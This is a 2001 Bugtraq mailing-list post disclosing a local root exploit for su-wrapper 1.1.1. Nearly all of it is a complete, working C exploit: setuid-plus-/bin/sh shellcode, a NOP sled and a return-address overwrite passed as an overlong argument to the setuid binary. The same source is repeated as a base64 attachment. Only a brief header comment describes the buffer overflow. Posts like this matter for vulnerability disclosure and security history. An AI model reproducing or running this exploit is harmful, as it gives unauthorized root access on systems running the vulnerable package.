su-wrapper 1.1.1 Local root exploit.
Date: Wed, 06 Jun 2001 23:27:21 GMT
From: dex <dexgod@softhome.net>
To: bugtraq@securityfocus.com
Subject: su-wrapper 1.1.1 Local root exploit.
--spruceLENPOZYBKQCAEXNEOQRN
Content-Type: text/plain
Content-Transfer-Type: 8bit
/* - su-wrapper.c - */
/*************************************************************************/
/* /usr/sbin/su-wrapper(su-wrapper 1.1.1) local root exploit. */
/* */
/* Package Description: */
/* su-wrapper is an little util which lets special users execute */
/* processes under another uid/gid. */
/* */
/* Vulnerability Description: */
/* If a long line on the first argument is gived, the program sends */
/* a SIGSEGV Signal. */
/* */
/* Affected: All Systems who have su-wrapper installed :P */
/* */
/* I don't know if other versions are vulnerable too. */
/* */
/* This bug was reported to Enrico Weigelt (weigelt@nibiru.thur.de) */
/* */
/* Greets: NOP, dr_fdisk^, yield, vlad, dead, fatal, kuk, neuro, alt3kx, */
/* etc */
/* dex: dexgod@softhome.net <> http://www.raza-mexicana.org - */
/*************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define BUFFERSIZE 1032
#define OFFSET 0
#define ALIGN 0
static char shellcode[]=
"\x29\xc0" /* subl %eax, %eax */
"\xb0\x46" /* movb $70, %al */
"\x29\xdb" /* subl %ebx, %ebx */
"\xb3\x0c" /* movb $12, %bl */
"\x80\xeb\x0c" /* subb $12, %bl */
"\x89\xd9" /* movl %ebx, %ecx */
"\xcd\x80" /* int $0x80 */
"\xeb\x18" /* jmp callz */
"\x5e" /* popl %esi */
"\x29\xc0" /* subl %eax, %eax */
"\x88\x46\x07" /* movb %al, 0x07(%esi) */
"\x89\x46\x0c" /* movl %eax, 0x0c(%esi) */
"\x89\x76\x08" /* movl %esi, 0x08(%esi) */
"\xb0\x0b" /* movb $0x0b, %al */
"\x87\xf3" /* xchgl %esi, %ebx */
"\x8d\x4b\x08" /* leal 0x08(%ebx), %ecx */
"\x8d\x53\x0c" /* leal 0x0c(%ebx), %edx */
"\xcd\x80" /* int $0x80 */
"\xe8\xe3\xff\xff\xff" /* call start */
"\x2f\x62\x69\x6e\x2f\x73\x68";
unsigned long get_sp(void) {
__asm__("movl %esp, %eax");
}
void main(int argc, char **argv) {
int i;
unsigned long addr;
char *buffer;
int buffersize = BUFFERSIZE;
int offset = OFFSET;
int align = ALIGN;
if(argc > 1) offset = atoi(argv[1]);
if(argc > 2) align = atoi(argv[2]);
if(argc > 3) buffersize = atoi(argv[3]);
buffer = (char *)malloc(buffersize +8);
addr = get_sp() - offset;
for(i = 0; i < buffersize; i+=4) {
*(long *)&buffer[i] = 0x90909090;
}
*(long *)&buffer[buffersize - 4] = addr;
*(long *)&buffer[buffersize - 8] = addr;
memcpy(buffer + buffersize - 8 - strlen(shellcode) - align, shellcode,
strlen(shellcode));
printf("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n");
printf("[x] su-wrapper 1.1.1 local root exploit\n");
printf("[x] dex: - dexgod@softhome.net <> http://www.raza-mexicana.org - \n");
printf("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\n");
printf("[x] Address = 0x%x, Align = %d, Offset = %d\n", addr, align, offset);
printf("=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n\n");
printf("[x] Exploiting...\n");
if ((execl("/usr/sbin/su-wrapper", "su-wrapper", buffer, NULL)) != 0) {
printf("Could not start su-wrapper, /usr/sbin/su-wrapper exists?\n");
}
}
--spruceLENPOZYBKQCAEXNEOQRN
Content-Type: application/octet-stream; name="su-wrapper.c"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="su-wrapper.c"
LyogLSBzdS13cmFwcGVyLmMgLSAqLwoKLyoqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKiovCi8qIC91c3Ivc2Jpbi9z
dS13cmFwcGVyKHN1LXdyYXBwZXIgMS4xLjEpIGxvY2FsIHJvb3QgZXhwbG9pdC4gICAgICAgICAg
ICAqLwovKiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgKi8KLyogUGFja2FnZSBEZXNjcmlwdGlvbjogICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICovCi8qIHN1LXdyYXBwZXIg
aXMgYW4gbGl0dGxlIHV0aWwgd2hpY2ggbGV0cyBzcGVjaWFsIHVzZXJzIGV4ZWN1dGUgICAgICAg
ICAqLyAKLyogcHJvY2Vzc2VzIHVuZGVyIGFub3RoZXIgdWlkL2dpZC4gICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICovCi8qICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAqLwovKiBWdWxuZXJhYmls
aXR5IERlc2NyaXB0aW9uOiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgKi8KLyogSWYgYSBsb25nIGxpbmUgb24gdGhlIGZpcnN0IGFyZ3VtZW50IGlzIGdpdmVkLCB0
aGUgcHJvZ3JhbSBzZW5kcyAgICAgICovCi8qIGEgU0lHU0VHViBTaWduYWwuICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAqLwovKiAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgKi8KLyogQWZmZWN0ZWQ6IEFsbCBTeXN0ZW1zIHdobyBoYXZlIHN1LXdyYXBwZXIgaW5zdGFs
bGVkIDpQICAgICAgICAgICAgICAgICovCi8qICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAqLwovKiBJIGRvbid0IGtu
b3cgaWYgb3RoZXIgdmVyc2lvbnMgYXJlIHZ1bG5lcmFibGUgdG9vLiAgICAgICAgICAgICAgICAg
ICAgKi8KLyogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICovCi8qIFRoaXMgYnVnIHdhcyByZXBvcnRlZCB0byBFbnJp
Y28gV2VpZ2VsdCAod2VpZ2VsdEBuaWJpcnUudGh1ci5kZSkgICAgICAqLwovKiAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgKi8KLyogR3JlZXRzOiBOT1AsIGRyX2ZkaXNrXiwgeWllbGQsIHZsYWQsIGRlYWQsIGZhdGFs
LCBrdWssIG5ldXJvLCBhbHQza3gsICovCi8qIGV0YyAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAqLwovKiAgICAgICAgZGV4
OiBkZXhnb2RAc29mdGhvbWUubmV0IDw+IGh0dHA6Ly93d3cucmF6YS1tZXhpY2FuYS5vcmcgLSAg
ICAgKi8KLyoqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq
KioqKioqKioqKioqKioqKioqKioqKiovCgojaW5jbHVkZSA8c3RkaW8uaD4KI2luY2x1ZGUgPHN0
ZGxpYi5oPgojaW5jbHVkZSA8c3RyaW5nLmg+CiNpbmNsdWRlIDx1bmlzdGQuaD4KCiNkZWZpbmUg
QlVGRkVSU0laRSAxMDMyCiNkZWZpbmUgT0ZGU0VUIDAKI2RlZmluZSBBTElHTiAwCgpzdGF0aWMg
Y2hhciBzaGVsbGNvZGVbXT0KICAiXHgyOVx4YzAiICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAvKiBzdWJsICVlYXgsICVlYXggICAgICAgICAgKi8KICAiXHhiMFx4NDYiICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAvKiBtb3ZiICQ3MCwgJWFsICAgICAgICAgICAgKi8KICAiXHgyOVx4
ZGIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAvKiBzdWJsICVlYngsICVlYnggICAgICAg
ICAgKi8KICAiXHhiM1x4MGMiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAvKiBtb3ZiICQx
MiwgJWJsICAgICAgICAgICAgKi8KICAiXHg4MFx4ZWJceDBjIiAgICAgICAgICAgICAgICAgICAg
ICAgICAvKiBzdWJiICQxMiwgJWJsICAgICAgICAgICAgKi8KICAiXHg4OVx4ZDkiICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAvKiBtb3ZsICVlYngsICVlY3ggICAgICAgICAgKi8KICAiXHhj
ZFx4ODAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAvKiBpbnQgJDB4ODAgICAgICAgICAg
ICAgICAgKi8KICAiXHhlYlx4MTgiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAvKiBqbXAg
Y2FsbHogICAgICAgICAgICAgICAgKi8KICAiXHg1ZSIgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAvKiBwb3BsICVlc2kgICAgICAgICAgICAgICAgKi8KICAiXHgyOVx4YzAiICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAvKiBzdWJsICVlYXgsICVlYXggICAgICAgICAgKi8KICAi
XHg4OFx4NDZceDA3IiAgICAgICAgICAgICAgICAgICAgICAgICAvKiBtb3ZiICVhbCwgMHgwNygl
ZXNpKSAgICAgKi8KICAiXHg4OVx4NDZceDBjIiAgICAgICAgICAgICAgICAgICAgICAgICAvKiBt
b3ZsICVlYXgsIDB4MGMoJWVzaSkgICAgKi8KICAiXHg4OVx4NzZceDA4IiAgICAgICAgICAgICAg
ICAgICAgICAgICAvKiBtb3ZsICVlc2ksIDB4MDgoJWVzaSkgICAgKi8KICAiXHhiMFx4MGIiICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAvKiBtb3ZiICQweDBiLCAlYWwgICAgICAgICAgKi8K
ICAiXHg4N1x4ZjMiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAvKiB4Y2hnbCAlZXNpLCAl
ZWJ4ICAgICAgICAgKi8KICAiXHg4ZFx4NGJceDA4IiAgICAgICAgICAgICAgICAgICAgICAgICAv
KiBsZWFsIDB4MDgoJWVieCksICVlY3ggICAgKi8KICAiXHg4ZFx4NTNceDBjIiAgICAgICAgICAg
ICAgICAgICAgICAgICAvKiBsZWFsIDB4MGMoJWVieCksICVlZHggICAgKi8KICAiXHhjZFx4ODAi
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAvKiBpbnQgJDB4ODAgICAgICAgICAgICAgICAg
Ki8KICAiXHhlOFx4ZTNceGZmXHhmZlx4ZmYiICAgICAgICAgICAgICAgICAvKiBjYWxsIHN0YXJ0
ICAgICAgICAgICAgICAgKi8KICAiXHgyZlx4NjJceDY5XHg2ZVx4MmZceDczXHg2OCI7Cgp1bnNp
Z25lZCBsb25nIGdldF9zcCh2b2lkKSB7CiBfX2FzbV9fKCJtb3ZsICVlc3AsICVlYXgiKTsKfQoK
dm9pZCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgewoKIGludCBpOwoKIHVuc2lnbmVkIGxv
bmcgYWRkcjsKCiBjaGFyICpidWZmZXI7CgogaW50IGJ1ZmZlcnNpemUgPSBCVUZGRVJTSVpFOwog
aW50IG9mZnNldCA9IE9GRlNFVDsKIGludCBhbGlnbiA9IEFMSUdOOwoKIGlmKGFyZ2MgPiAxKSBv
ZmZzZXQgPSBhdG9pKGFyZ3ZbMV0pOwoKIGlmKGFyZ2MgPiAyKSBhbGlnbiA9IGF0b2koYXJndlsy
XSk7CgogaWYoYXJnYyA+IDMpIGJ1ZmZlcnNpemUgPSBhdG9pKGFyZ3ZbM10pOwoKIGJ1ZmZlciA9
IChjaGFyICopbWFsbG9jKGJ1ZmZlcnNpemUgKzgpOwoKIGFkZHIgPSBnZXRfc3AoKSAtIG9mZnNl
dDsKCiBmb3IoaSA9IDA7IGkgPCBidWZmZXJzaXplOyBpKz00KSB7CiAgKihsb25nICopJmJ1ZmZl
cltpXSA9IDB4OTA5MDkwOTA7CiB9CgogKihsb25nICopJmJ1ZmZlcltidWZmZXJzaXplIC0gNF0g
PSBhZGRyOwoKICoobG9uZyAqKSZidWZmZXJbYnVmZmVyc2l6ZSAtIDhdID0gYWRkcjsKCiBtZW1j
cHkoYnVmZmVyICsgYnVmZmVyc2l6ZSAtIDggLSBzdHJsZW4oc2hlbGxjb2RlKSAtIGFsaWduLCBz
aGVsbGNvZGUsIHN0cmxlbihzaGVsbGNvZGUpKTsKCiBwcmludGYoIj0tPS09LT0tPS09LT0tPS09
LT0tPS09LT0tPS09LT0tPS09LT0tPS09LT0tPS09LT0tPS09LT0tPS09LT0tPS09XG4iKTsKIAog
cHJpbnRmKCJbeF0gc3Utd3JhcHBlciAxLjEuMSBsb2NhbCByb290IGV4cGxvaXRcbiIpOwogcHJp
bnRmKCJbeF0gZGV4OiAtIGRleGdvZEBzb2Z0aG9tZS5uZXQgPD4gaHR0cDovL3d3dy5yYXphLW1l
eGljYW5hLm9yZyAtIFxuIik7CgogcHJpbnRmKCI9LT0tPS09LT0tPS09LT0tPS09LT0tPS09LT0t
PS09LT0tPS09LT0tPS09LT0tPS09LT0tPS09LT0tPS09LT0tPVxuXG4iKTsKCiBwcmludGYoIlt4
XSBBZGRyZXNzID0gMHgleCwgQWxpZ24gPSAlZCwgT2Zmc2V0ID0gJWRcbiIsIGFkZHIsIGFsaWdu
LCBvZmZzZXQpOwoKIHByaW50ZigiPS09LT0tPS09LT0tPS09LT0tPS09LT0tPS09LT0tPS09LT0t
PS09LT0tPS09LT0tPS09LT0tPS09LT0tPS09LT1cblxuIik7CgogcHJpbnRmKCJbeF0gRXhwbG9p
dGluZy4uLlxuIik7CgogaWYgKChleGVjbCgiL3Vzci9zYmluL3N1LXdyYXBwZXIiLCAic3Utd3Jh
cHBlciIsIGJ1ZmZlciwgTlVMTCkpICE9IDApIHsKICBwcmludGYoIkNvdWxkIG5vdCBzdGFydCBz
dS13cmFwcGVyLCAvdXNyL3NiaW4vc3Utd3JhcHBlciBleGlzdHM/XG4iKTsKIH0KCn0K
--spruceLENPOZYBKQCAEXNEOQRN--
